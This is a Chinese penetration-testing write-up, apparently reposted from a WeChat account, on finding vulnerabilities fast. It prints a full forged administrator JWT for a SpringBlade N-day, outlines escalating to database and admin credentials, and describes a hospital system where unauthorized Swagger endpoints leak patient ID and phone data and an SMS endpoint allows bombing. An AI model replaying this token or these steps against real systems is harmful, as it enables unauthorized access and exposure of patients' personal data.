安服仔漏洞挖掘
在项目中一般时间很紧,给挖掘漏洞的时间也就一天,还必须有漏洞产出,本次来讲述一下 如何快速挖掘漏洞,本次过程相关截图均已进行脱敏处理。
主要用到的工具
-
afrog
-
FindSomething
-
yakit
-
dirsearch
-
fuff
指纹识别使用Nday漏洞利用
通过afrog工具识别到了项目中有一个资产使用了Spring Blade框架,并快速使用Nday完成漏洞利用
构造jwt
使用构造的jwt加密
Blade-Auth: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ
获取数据库账户密码
获取管理员账户密码
解密管理员md5 登录后台
某医院漏洞挖掘
在一次医院渗透时,其微信公众号有功能,抓包将域名提取出来进行测试
医院挖掘漏洞大部分可按照这个方向来挖掘
1、接口未授权访问
2、sql注入漏洞
3、Swagger接口未授权
未授权漏洞
Swagger接口未授权
在对Swagger泄露的接口进行未授权批量测试,推荐使用yakit工具
查询到一堆医院用户的个人信息,身份证,电话号码等
使用yakit fuzz模糊测试
发现prod-api/resource/sms/code接口提示报错 phoneNumber
将参数拼接,经过测试可以无限次发送请求,造成短信轰炸
/prod-api/resource/sms/code?phoneNumber=1888888888 HTTP/1.1原文始发于微信公众号(安全逐梦人):记一次项目中快速挖掘漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论